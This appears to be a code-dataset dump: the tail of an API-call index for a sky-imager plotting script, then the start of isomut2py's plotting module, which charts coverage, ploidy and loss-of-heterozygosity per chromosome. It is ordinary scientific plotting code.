{"api_name": "matplotlib.pyplot.close", "line_number": 474, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 474, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm.get_cmap", "line_number": 481, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 481, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 481, "usage_type": "name"}, {"api_name": "cmocean.cm", "line_number": 482, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", "line_number": 488, "usage_type": "call"}, {"api_name": "numpy.isfinite", "line_number": 492, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 498, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 499, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 500, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 501, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 504, "usage_type": "call"}, {"api_name": "skysol.lib.misc.grid2latlon", "line_number": 505, "usage_type": "call"}, {"api_name": "skysol.lib.misc", "line_number": 505, "usage_type": "name"}, {"api_name": "skysol.lib.misc.grid2latlon", "line_number": 510, "usage_type": "call"}, {"api_name": "skysol.lib.misc", "line_number": 510, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 511, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 540, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 540, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 544, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 544, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 546, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 546, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 548, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 548, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 550, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 550, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 554, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 554, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 556, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 558, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 558, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 558, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 559, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 559, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 563, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 563, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 567, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 567, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 570, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 571, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 571, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 571, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 573, "usage_type": 
"call"}, {"api_name": "matplotlib.pyplot", "line_number": 573, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 574, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 574, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 581, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 581, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 583, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 584, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 584, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 584, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 586, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 586, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 587, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 587, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 593, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 593, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 594, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 595, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 595, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm.get_cmap", "line_number": 595, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 595, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 596, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 596, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 598, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 598, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 605, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 605, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 607, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 609, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 609, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 610, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 610, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 614, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 614, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 624, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 624, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 626, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 626, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 628, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 628, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 634, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 634, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 641, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 641, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 643, "usage_type": 
"call"}, {"api_name": "matplotlib.pyplot", "line_number": 643, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 648, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 648, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 649, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 652, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 652, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 656, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 656, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 657, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 658, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 658, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 659, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 659, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 660, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 660, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 666, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 666, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 667, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 667, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 687, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 687, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 690, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 690, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 692, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 692, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 694, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 694, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 700, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 700, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 706, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 706, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 708, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 708, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 714, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 714, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 715, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 715, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 723, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 723, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 725, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 725, "usage_type": "name"}, {"api_name": "time.time", "line_number": 734, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 761, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 761, "usage_type": "name"}, {"api_name": 
"cv2.cvtColor", "line_number": 764, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 764, "usage_type": "attribute"}, {"api_name": "scipy.ndimage.interpolation.rotate", "line_number": 767, "usage_type": "call"}, {"api_name": "numpy.degrees", "line_number": 767, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 768, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 768, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 769, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 769, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 770, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 770, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 771, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 771, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 777, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 777, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 778, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 778, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 779, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 779, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 784, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 784, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 786, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 786, "usage_type": "attribute"}, {"api_name": "scipy.ndimage.interpolation.rotate", "line_number": 788, "usage_type": "call"}, {"api_name": "numpy.degrees", "line_number": 788, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 791, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 791, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 792, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 792, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 793, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 793, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 794, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 794, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 796, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 796, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 797, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 797, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 798, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 798, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 805, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 805, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm.get_cmap", "line_number": 810, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 810, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 810, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 811, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 811, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 812, "usage_type": "attribute"}, {"api_name": 
"matplotlib.pyplot.scatter", "line_number": 827, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 827, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 829, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 832, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 832, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 834, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 839, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 839, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 840, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 840, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 847, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 855, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 855, "usage_type": "name"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 863, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 863, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot_date", "line_number": 865, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 865, "usage_type": "name"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 872, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 872, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot_date", "line_number": 874, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 874, "usage_type": "name"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 879, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 879, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot_date", "line_number": 880, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 880, "usage_type": "name"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 888, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 888, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot_date", "line_number": 890, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 890, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 893, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 893, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 895, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 895, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 896, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 896, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 898, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 898, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 900, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 900, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 902, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 902, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 905, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 905, "usage_type": "name"}, {"api_name": "matplotlib.dates.DateFormatter", "line_number": 906, "usage_type": 
"call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 907, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 907, "usage_type": "name"}, {"api_name": "datetime.datetime.strftime", "line_number": 913, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 913, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 913, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.text", "line_number": 914, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 914, "usage_type": "name"}, {"api_name": "numpy.char.capitalize", "line_number": 914, "usage_type": "call"}, {"api_name": "numpy.char", "line_number": 914, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.draw", "line_number": 920, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 920, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 921, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 921, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 922, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 922, "usage_type": "name"}, {"api_name": "skysol.lib.drawings.sunpath", "line_number": 933, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 937, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 938, "usage_type": "call"}, {"api_name": "skysol.lib.drawings.draw_boundaries", "line_number": 938, "usage_type": "call"}, {"api_name": "scipy.ndimage.interpolation.rotate", "line_number": 939, "usage_type": "call"}, {"api_name": "numpy.degrees", "line_number": 939, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 941, "usage_type": "call"}, {"api_name": "scipy.ndimage.interpolation.rotate", "line_number": 943, "usage_type": "call"}, {"api_name": "numpy.degrees", "line_number": 943, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 945, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 945, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 946, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 946, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 947, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 947, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 948, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 948, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 953, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 953, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 955, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 955, "usage_type": "name"}, {"api_name": "datetime.datetime.strftime", "line_number": 958, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 958, "usage_type": "name"}, {"api_name": "datetime.datetime.strftime", "line_number": 959, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 959, "usage_type": "name"}, {"api_name": "numpy.round", "line_number": 983, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1005, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1005, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 1008, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1008, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.subplot2grid", "line_number": 1014, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1014, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 1018, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 1018, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 1020, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 1022, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1022, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1023, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1023, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 1024, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1024, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1025, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1025, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 1027, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1027, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 1028, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1028, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 1034, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1034, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 1036, "usage_type": "call"}, {"api_name": "cv2.COLOR_GRAY2BGR", "line_number": 1036, "usage_type": "attribute"}, {"api_name": "skysol.lib.drawings.cloud_path", "line_number": 1039, "usage_type": "call"}, {"api_name": "skysol.lib.drawings", "line_number": 1039, "usage_type": "name"}, {"api_name": "cv2.circle", "line_number": 1042, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 1045, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1045, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 1046, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1046, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 1046, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 1052, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1052, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 1056, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 1056, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 1057, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1057, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 1058, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1058, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 1062, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1062, "usage_type": "name"}, {"api_name": "skysol.lib.drawings.cloud_path", "line_number": 1065, "usage_type": "call"}, {"api_name": "skysol.lib.drawings", "line_number": 1065, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 1067, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 1067, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 1068, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1068, "usage_type": 
"name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 1069, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1069, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 1073, "usage_type": "call"}, {"api_name": "numpy.degrees", "line_number": 1073, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 1078, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1078, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots_adjust", "line_number": 1079, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1079, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.draw", "line_number": 1080, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1080, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 1081, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1081, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 1082, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1082, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1083, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1083, "usage_type": "name"}]} +{"seq_id": "32467814491", "text": "try:\n from isomut2py import io\n\n import matplotlib as __mpl\n\n __mpl.use('Agg')\n import matplotlib.pyplot as __plt\n from matplotlib.patches import Rectangle as __Rectangle\n import base64 as __base64\n import numpy as __np\n from io import BytesIO as __BytesIO\n import os as __os\n import pandas as __pd\n from datetime import datetime as __datetime\n from scipy import stats as __stats\n import seaborn as __sns\nexcept ImportError:\n print('ImportError in isomut2py.plot, some plotting functions might not work.')\n\n\ndef plot_karyotype_for_chrom(chrom, df, return_string=True):\n \"\"\"\n\n Plots karyotype information (coverage, estimated ploidy, estimated LOH, reference base frequencies) about the sample for a given chromosome.\n\n :param chrom: The chromosome to plot. (str)\n :param df: The dataframe containing ploidy and LOH information. (pandas.DataFrame)\n :param return_string: If True, only a temporary plot is generated and its base64 code is returned, that can be included in HTML files. (default: True) (bool)\n\n :returns: If the return_string value is True, a base64 encoded string of the image. 
Otherwise, a matplotlib figure.\n\n \"\"\"\n try:\n __sns.set(style=\"whitegrid\", font=\"DejaVu Sans\")\n except:\n pass\n\n covcolor = '#FFA500' # '#FFD700'\n rnfcolor = '#ADD8E6' # '#483D8B' # (209 / 255., 10 / 255., 124 / 255.)\n rnfalpha = 0.4\n guidelinecolor = '#E6E6FA'\n\n p = list(df.sort_values(by='pos')['pos'])\n cov = list(df.sort_values(by='pos')['cov'])\n rf = list(df.sort_values(by='pos')['mut_freq'])\n rf = list(1 - __np.array(rf))\n pl = list(df.sort_values(by='pos')['ploidy'])\n pl_i = list(float(1) / __np.array(pl))\n loh = __np.array(list(df.sort_values(by='pos')['LOH']))\n loh_change = __np.where(loh[:-1] != loh[1:])[0]\n\n f, ax1 = __plt.subplots()\n f.set_size_inches(20, 10)\n ax2 = ax1.twinx()\n for i in range(len(loh_change)):\n if (i == 0 and loh[loh_change[i]] == 1):\n w = p[loh_change[i]] - p[0]\n k = __Rectangle((p[0], 0), w, 1, alpha=0.1, facecolor='black', edgecolor='none')\n ax2.add_patch(k)\n if (loh[loh_change[i]] == 0):\n if (i == len(loh_change) - 1):\n w = max(p) - p[loh_change[i]]\n else:\n w = p[loh_change[i + 1]] - p[loh_change[i]]\n k = __Rectangle((p[loh_change[i]], 0), w, 1, alpha=0.1, facecolor='black', edgecolor='none')\n ax2.add_patch(k)\n\n ax1.plot(p, cov, c=covcolor)\n\n for i in range(2, 10):\n ax2.plot(p, [1 - float(1) / i] * len(p), c=guidelinecolor)\n ax2.plot(p, [float(1) / i] * len(p), c=guidelinecolor)\n ax2.scatter(p, rf, c='none', edgecolor=rnfcolor, alpha=rnfalpha)\n ax2.scatter(p, pl_i, c='none', edgecolor='black', alpha=1)\n\n ax2.set_ylabel('reference base frequency\\n', size=15, color=rnfcolor)\n ax1.set_xlabel('\\n\\ngenomic position', size=15)\n ax2.yaxis.set_tick_params(labelsize=15, colors=rnfcolor)\n ax2.xaxis.set_tick_params(labelsize=15)\n ax1.xaxis.set_tick_params(labelsize=15)\n ax1.set_ylabel('coverage\\n', size=15, color=covcolor)\n ax1.yaxis.set_tick_params(labelsize=15, colors=covcolor)\n ax1.set_ylim([0, 1000])\n ax2.set_ylim([0, 1])\n ax2.set_xlim([min(p), max(p)])\n ax1.spines['bottom'].set_color('lightgrey')\n ax1.spines['top'].set_color('lightgrey')\n ax1.spines['left'].set_color('lightgrey')\n ax1.spines['right'].set_color('lightgrey')\n ax2.spines['bottom'].set_color('lightgrey')\n ax2.spines['top'].set_color('lightgrey')\n ax2.spines['left'].set_color('lightgrey')\n ax2.spines['right'].set_color('lightgrey')\n __plt.title('Chromosome: ' + chrom + '\\n\\n', size=20)\n\n if (return_string):\n figfile = __BytesIO()\n __plt.savefig(figfile, bbox_inches='tight', format='png')\n __plt.close()\n figfile.seek(0)\n figdata_png = __base64.b64encode(figfile.getvalue())\n return figdata_png\n else:\n __plt.show()\n __plt.close()\n return f\n\n\ndef plot_karyotype_for_all_chroms(chromosomes, output_dir, return_string=False):\n \"\"\"\n\n Plots karyotype information (coverage, estimated ploidy, estimated LOH, reference base frequencies) about the sample for all analysed chromosomes.\n\n :param chromosomes: the list of chromosomes to plot (list of str)\n :param output_dir: the path to the directory where PE_fullchrom_[chrom].txt files are stored. (str)\n :param return_string: If True, only temporary plots are generated and their base64 codes are returned, so they can be included in HTML files. (default: False) (bool)\n\n :returns: If the return_string value is True, a list of base64 encoded strings of the images. 
